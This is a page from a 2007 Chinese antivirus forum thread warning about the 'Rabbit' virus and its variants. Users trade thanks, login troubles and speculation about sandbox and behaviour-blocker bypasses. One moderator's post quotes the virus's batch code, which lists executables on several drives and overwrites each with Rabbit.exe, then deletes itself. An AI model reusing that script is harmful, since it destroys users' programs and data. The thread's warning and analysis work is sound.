警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

«3 4 5 678 9 10

7 / 10 页

跳转页

警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】

小小饭长初生襁褓狮帖子:78 注册: 2006-12-05 来自:	发表于： 2007-04-09 17:46 \| 短消息资料字号：小中大 61楼呵呵
小小饭长初生襁褓狮帖子:78 注册: 2006-12-05 来自:

★蓝色尘埃★ 快乐黄口狮帖子:262 注册: 2007-04-05 来自:	发表于： 2007-04-09 21:27 \| 短消息资料字号：小中大 62楼谢谢
★蓝色尘埃★ 快乐黄口狮帖子:262 注册: 2007-04-05 来自:

抽风超人初生襁褓狮帖子:2 注册: 2005-07-06 来自:	发表于： 2007-04-09 21:50 \| 短消息资料字号：小中大 63楼卡饭中招了？我今天一天都登陆不上。。
抽风超人初生襁褓狮帖子:2 注册: 2005-07-06 来自:

飞逝v流星初生襁褓狮帖子:62 注册: 2006-10-08 来自:	发表于： 2007-04-10 00:37 \| 短消息资料字号：小中大 64楼怎么老是有人在做病毒，不过也好，让大家对安全都有点意识
飞逝v流星初生襁褓狮帖子:62 注册: 2006-10-08 来自:

高歌猛进初生襁褓狮帖子:2377 注册: 2006-10-09 来自:	发表于： 2007-04-10 08:32 \| 短消息资料字号：小中大 65楼这贴子在别的地方出现了，没注明转贴，很是替猫版不平（不会是猫版自己转的吧）
高歌猛进初生襁褓狮帖子:2377 注册: 2006-10-09 来自:

spiritfire 锋芒艾服狮帖子:1266 注册: 2006-10-22 来自:	发表于： 2007-04-10 09:10 \| 短消息资料字号：小中大 66楼加壳方式？
spiritfire 锋芒艾服狮帖子:1266 注册: 2006-10-22 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2007-04-10 10:36 \| 短消息资料字号：小中大 67楼这个病毒现在的广为分析和讨论，为以后其他制毒者提供了更好的思路。如果将熊猫到现在的流行的几个病毒的特点和兔兔合在一起。估计就差不多横扫网络了。所有的用户，都没一个好下去场。当然了，只有加了影子系统的，只上网玩的，才能幸免。其他的要保存工作数据的，无法上影子系统的用户，就都得完蛋。现在想，以后的主动防御，将成最主要的系统配置了。但是还得不断推出新的主动防御软件。现在的SSM已广为人知，它的主体文件大家都知道的清清楚楚。我觉得SSM这类软件，在监控时，应该还是有漏洞的。不知以后的病毒会怎样。
天月来了版主帖子:76904 注册: 2007-02-06 来自:

大版主

帖子:72578
注册: 2003-04-10
来自:

发表于： 2007-04-10 10:44 | 只看楼主 短消息资料

字号：小中大 68楼

引用:

【天月来了的贴子】这个病毒现在的广为分析和讨论，为以后其他制毒者提供了更好的思路。

如果将熊猫到现在的流行的几个病毒的特点和兔兔合在一起。估计就差不多横扫网络了。

所有的用户，都没一个好下去场。

当然了，只有加了影子系统的，只上网玩的，才能幸免。

其他的要保存工作数据的，无法上影子系统的用户，就都得完蛋。

现在想，以后的主动防御，将成最主要的系统配置了。

但是还得不断推出新的主动防御软件。

现在的SSM已广为人知，它的主体文件大家都知道的清清楚楚。

我觉得SSM这类软件，在监控时，应该还是有漏洞的。

不知以后的病毒会怎样。

………………

没人敢说“影子”不会被病毒突破。事实上，木马KillDisk即可突破影子。
做光盘系统备份，经常备份非系统分区的重要数据到光盘上————是比较保险的办法之一。

艾玛大版主帖子:18894 注册: 2004-01-01 来自:	发表于： 2007-04-10 10:46 \| 短消息资料字号：小中大 69楼 C:\WINDOWS\system32\LOVETZ.bat C:\WINDOWS\system32\TZ.bat FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i" del %0 FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\.exe>>c:\windows\msconfig.inf cd C:\Program Files dir .exe /s /b >>c:\windows\msconfig1.inf http://hi.baidu.com/killvir/blog/item/4823a61e06bcb91e4034177d.html update 2007.04.10
艾玛大版主帖子:18894 注册: 2004-01-01 来自:

天月来了版主帖子:76904 注册: 2007-02-06 来自:	发表于： 2007-04-10 10:57 \| 短消息资料字号：小中大 70楼木马KillDisk能突破影子，够狠的！！！！！估计这玩意也是写入分区里某些东西，才能突破的吧。如果它的机理也被利用，岂不是天下无敌了？看来微软得开发，在系统状态下无法向分区和系统文件中注入任何玩意的新操作系统了。最好的是微软牵头迫使所有的软件都是无需安装和注册的才行。这样开发出的不可以写入任何信息或数据的系统，才能长寿点。
天月来了版主帖子:76904 注册: 2007-02-06 来自:

<<上一主题|下一主题>>

«3 4 5 678 9 10

7 / 10 页

跳转页

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】

警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】

瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛警惕恶性病毒“兔宝宝”【4月8日原版、4月10日出现新变种】